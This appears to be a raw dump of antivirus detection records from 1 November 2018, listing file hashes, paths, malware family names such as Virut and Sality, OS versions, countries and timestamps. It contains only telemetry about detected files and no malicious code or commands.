  Row(detection=Row(filename='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B8A0965DF696458205B59EFC1005088B4CC2508C68744F2D4D98A7869D875A8C', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='b8a0965df696458205b59efc1005088b4cc2508c68744f2d4d98a7869d875a8c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='khccfdjdl.dll', filepath='\\\\?\\C:\\Program Files\\FrwbVTWcJIE\\kHCcfDJdl.dll', filesize=576000, name='HEUR/AGEN.1030619.#M1.#R1'), hash='b8a61b846be3accaab635867d7eb1629b9d193971904b6d5ce83131d31f361bb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:44:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B8B0C4CED6F4940AD618504357EE6F92FC54251C20D762162F50B9A683781759', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153804-8a082ffd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-153758-8985C800\\AVSCAN-20181101-153804-8A082FFD', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b8cfbec4d35a61e9d497865523d254246edf4b602a65c7bdd3b440608d5e1331', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210803-5a047803', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-210803-5A047803', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211555-9c05d275', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211555-9C05D275', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211555-9c05d275', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211555-9C05D275', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211005-6b24847f', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211005-6B24847F', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211005-6b24847f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211005-6B24847F', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210803-5a047803', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-210803-5A047803', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-194538-8c1d0bcb', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5c5c457\\AVSCAN-20181031-193652-4284189F\\AVSCAN-20181031-194538-8C1D0BCB', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='đề xuất kinh phí.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\đề xuất kinh phí.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b91a3cfe962e755cd293d2527015eea1da0b49acb1b8a3828377fc7ae92ab308', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161353-e26b7445', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161353-E26B7445', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='b91a3cfe962e755cd293d2527015eea1da0b49acb1b8a3828377fc7ae92ab308', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B99B1D8CE44ADB3D7693907B7672DDC28E0AEEE2D1F3FA7894AA642EB9896999', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084648-f262a929', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1735652b\\AVSCAN-20181101-084513-DF755581\\AVSCAN-20181101-084648-F262A929', filesize=592000, name='PUA/DownloadGuide.Gen.#M1.#R1'), hash='b9d5f662834b2ab413e36aa56dc6b4a0f75cbaf69506bfd61652935700b3d92b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BA302F8DA3F8ECCA4165EB2870EA815C88CCEBA52CAA4F833B7D402A40899D6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ba302f8da3f8ecca4165eb2870ea815c88cceba52caa4f833b7d402a40899d6d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='21137[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cache\\UP83RKCA\\21137[1].htm', filesize=56000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ba3ec70aa46b32062de3c8ca0c4e23df68829c095a3a07f42f6eeec5868437c3', metadata=Row(cmdline='-ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe', parentsize=237384, timestamp='2018-11-01T11:38:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123930-26208c62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb80a544\\AVSCAN-20181101-123845-1E4AD714\\AVSCAN-20181101-123930-26208C62', filesize=56000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ba3ec70aa46b32062de3c8ca0c4e23df68829c095a3a07f42f6eeec5868437c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\?\\H:\\12.) DESHA_ITD\\2.) OTHER THINGS\\IERP MANILA\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='ba4887fb618f9175010e02cd0759ded976db393f5f6ef7e84c11476dd9b80603', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205200-629d11be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a065b318\\AVSCAN-20181101-204324-26BCB321\\AVSCAN-20181101-205200-629D11BE', filesize=4736000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='ba789b44e57d3290f318976715911d975db6e5d50822bbcd421524f1876af1d6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162406-61584e8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee96c37\\AVSCAN-20181101-161809-45A9D8A6\\AVSCAN-20181101-162406-61584E8C', filesize=4736000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='ba789b44e57d3290f318976715911d975db6e5d50822bbcd421524f1876af1d6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:21:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BAA5D62AD4E67869CD3F251D88971F961902A01438F690B4192805A0C266AF6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmic.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\wmic.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='babb25f1a9d83b515bb5545dd89387d561d4a64030a3d66f560c657e61ff7a75', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setpmdefault.exe', filepath='C:\\xampp\\MercuryMail\\setpmdefault.exe', filesize=504000, name='W32/Jeefo.A.#M1.#R1'), hash='bad6eed724f01f67697943742ccecce77567d689318d8372e75f5f7229937cc0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:I\\\\\\/IYlszboUSLZa5D.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:49:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_1b649c82.exe', filepath='E:\\UPD1.RLD.FA16\\Setup_1b649c82.exe', filesize=128000, name='HEUR/AGEN.1008878.#M1.#R1'), hash='bae28f50a97a46e67fba78fa185937d3cb645481ec0ff707a56b630e4f8566d5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe266_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe266 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=349184, timestamp='2018-11-01T15:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_11e0eea1.exe', filepath='E:\\UPD1.RLD.FA16\\Setup_11e0eea1.exe', filesize=128000, name='HEUR/AGEN.1008878.#M1.#R1'), hash='bae28f50a97a46e67fba78fa185937d3cb645481ec0ff707a56b630e4f8566d5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe266_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe266 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=349184, timestamp='2018-11-01T15:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='e:\\all toll\\dragon_v3.53\\drivers\\mtk usb driver\\driver_auto_installer\\smartphonedriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='baeae33ce097663d89a9f865cf2695111b6501477b98d438c9c8f5e8ed4dfaa6', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:26:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125521-64dfe15e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91192a31\\AVSCAN-20181101-125414-5E6EECAD\\AVSCAN-20181101-125521-64DFE15E', filesize=244000, name='TR/BProtector.nes.4.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\DEB710E7-BAB0-7891-9FA6-68327206E669\\Latest\\ccp.exe', filesize=244000, name='TR/Drop.Rotbrow.mcv.1.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline='-Embedding', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Sony\\VAIO Care\\Auslogics\\AuslogicExeCOMServer.exe', parentsize=29888, timestamp='2018-11-01T11:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BB24F754E5FCFDE6F25EC9EC7ACB606F75EC2122B50CD73A8BF0592B320C0C01', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xoqijdgi.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\XOQIjDgI.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thlvqdim.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ThLvQdIM.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hfbywwmd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HFBYWWmd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qmpcipgt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qMPcIPgt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pwfuwurj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\pWFuwURJ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bgvmnyho.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\bgVMnyhO.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emucsikf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\eMUcsIkf.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='onxoeges.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\OnxOeges.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lxpqavbb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\lXpqAVBb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cwysjoea.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CWysjoea.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hyshgrek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hySHGREK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bkcohhvj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BKcOHhvj.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cudsgaky.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CUDsGaKY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yrpgnxlo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YRPgnXlo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ylamirxs.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yLaMIRxs.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ekrdfnkt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\eKrdFNKT.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hkufryvl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HkUFRYvl.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yxkxrxag.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yXkxrxaG.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vfqyqfls.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\VFqYQfls.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:53Z'), dt=datetime.date(2018, 11, 1)),
